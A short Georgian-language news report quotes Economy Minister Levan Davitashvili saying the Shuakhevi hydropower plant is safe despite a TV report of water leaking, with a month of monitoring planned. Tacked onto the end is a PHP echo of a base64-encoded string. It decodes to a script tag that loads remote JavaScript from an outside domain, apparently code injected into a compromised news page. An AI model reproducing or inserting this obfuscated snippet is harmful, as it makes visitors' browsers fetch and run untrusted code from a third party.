celsiusi
ავერსი საქკაბელი

ეკონომიკის მინისტრი ლევან დავითაშვილი ამბობს, რომ შუახევიჰესი უსაფრთხოა, თუმცა ერთი თვის განმავლობაში სამინისტრო ჰესს მაინც დააკვირდება.

ასე უპასუხა მან "მთავარი არხის" ჟურნალისტის კითხვას, რომელიც მათ მიერ მომზადებულ რეპორტაჟს შეეხებოდა, სადაც ნათქვამი იყო, რომ ჰესიდან წყალი ჟონავს და ჰიდროსადგური საფრთხის შემცველია. 

"რა ანგარიშიც მომივიდა მეუბნებიან, რომ ამ შემთხვევაში არ არის გამოვლენილი კაშხლის ბეტონის რღვევა და წყლის ნაკადი არ უკავშირდება სადგურის რაიმე სახის დაზიანებას. აქედან გამომდინარე, უსაფრთხოა და წყლის შეგუბება დაზიანების გამო არ არის დაწყებული, რაზეც სავარაუდოდ, იყო სიუჟეტში საუბარი, თუმცა არ მინახავს. ენერგეტიკოსების მხრიდან დაკვირვება მიმდინარეობს და ეს პროცესი ერთი თვის ვადაში გაგრძელდება იმისთვის, რომ რისკი გამოირიცხოს. დაკვირვება საჭირო გახდა იმიტომ, რომ დაისვა კითხვა. აღმოჩნდა, რომ წყალი კონსტრუქციის დაზიანების გამო არ არის. ყოველგვარი რისკის თავიდან აცილების გამო კი დავაკვირდებით", - ამბობს დავითაშვილი.

613
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");